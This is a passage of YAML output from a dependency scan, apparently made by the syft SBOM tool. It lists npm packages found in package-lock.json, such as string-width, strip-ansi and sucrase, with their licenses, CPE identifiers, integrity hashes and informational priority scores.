integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
|
|
dependencies:
|
|
emoji-regex: ^8.0.0
|
|
is-fullwidth-code-point: ^3.0.0
|
|
strip-ansi: ^6.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a6a2288a986748af
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: string-width 5.1.2'
|
|
title: string-width 5.1.2
|
|
description: 'Package discovered: string-width 5.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 303a44f8f6ca903e
|
|
name: string-width
|
|
version: 5.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/string-width@5.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz
|
|
integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==
|
|
dependencies:
|
|
eastasianwidth: ^0.2.0
|
|
emoji-regex: ^9.2.2
|
|
strip-ansi: ^7.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d318d3d155c6a9dd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: string_decoder 1.1.1'
|
|
title: string_decoder 1.1.1
|
|
description: 'Package discovered: string_decoder 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 829e7f04cb28f180
|
|
name: string_decoder
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/string_decoder@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz
|
|
integrity: sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==
|
|
dependencies:
|
|
safe-buffer: ~5.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 42e775567d560303
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: string_decoder 1.3.0'
|
|
title: string_decoder 1.3.0
|
|
description: 'Package discovered: string_decoder 1.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 31e1990d6adabf2b
|
|
name: string_decoder
|
|
version: 1.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/string_decoder@1.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz
|
|
integrity: sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==
|
|
dependencies:
|
|
safe-buffer: ~5.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 611033baae4657b2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: strip-ansi 6.0.1'
|
|
title: strip-ansi 6.0.1
|
|
description: 'Package discovered: strip-ansi 6.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e47d9046945afbeb
|
|
name: strip-ansi
|
|
version: 6.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/strip-ansi@6.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz
|
|
integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
|
|
dependencies:
|
|
ansi-regex: ^5.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ca95150df82b38c3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: strip-ansi 7.2.0'
|
|
title: strip-ansi 7.2.0
|
|
description: 'Package discovered: strip-ansi 7.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: efdaea275ca01865
|
|
name: strip-ansi
|
|
version: 7.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/strip-ansi@7.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz
|
|
integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==
|
|
dependencies:
|
|
ansi-regex: ^6.2.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 680b8434591c36cc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: strnum 2.2.3'
|
|
title: strnum 2.2.3
|
|
description: 'Package discovered: strnum 2.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9368f059f77a6fca
|
|
name: strnum
|
|
version: 2.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/strnum@2.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz
|
|
integrity: sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 71b1b284c1af24b8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: stubs 3.0.0'
|
|
title: stubs 3.0.0
|
|
description: 'Package discovered: stubs 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 10401a0421b092a3
|
|
name: stubs
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/stubs@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz
|
|
integrity: sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a4561300304da31c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: styled-jsx 5.1.1'
|
|
title: styled-jsx 5.1.1
|
|
description: 'Package discovered: styled-jsx 5.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b71f2c964dcb79d3
|
|
name: styled-jsx
|
|
version: 5.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/styled-jsx@5.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz
|
|
integrity: sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw==
|
|
dependencies:
|
|
client-only: 0.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d085117a189c2037
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: sucrase 3.35.1'
|
|
title: sucrase 3.35.1
|
|
description: 'Package discovered: sucrase 3.35.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 302884898f3a35c4
|
|
name: sucrase
|
|
version: 3.35.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/sucrase@3.35.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz
|
|
integrity: sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==
|
|
dependencies:
|
|
'@jridgewell/gen-mapping': ^0.3.2
|
|
commander: ^4.0.0
|
|
lines-and-columns: ^1.1.6
|
|
mz: ^2.7.0
|
|
pirates: ^4.0.1
|
|
tinyglobby: ^0.2.11
|
|
ts-interface-checker: ^0.1.9
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 57ae1f3ed312e075
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: supports-preserve-symlinks-flag 1.0.0'
|
|
title: supports-preserve-symlinks-flag 1.0.0
|
|
description: 'Package discovered: supports-preserve-symlinks-flag 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cb6982ee071dbb85
|
|
name: supports-preserve-symlinks-flag
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/supports-preserve-symlinks-flag@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz
|
|
integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7b659eb857ace717
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0'
|
|
title: svg-arc-to-cubic-bezier 3.2.0
|
|
description: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 03465a3bffd322b9
|
|
name: svg-arc-to-cubic-bezier
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
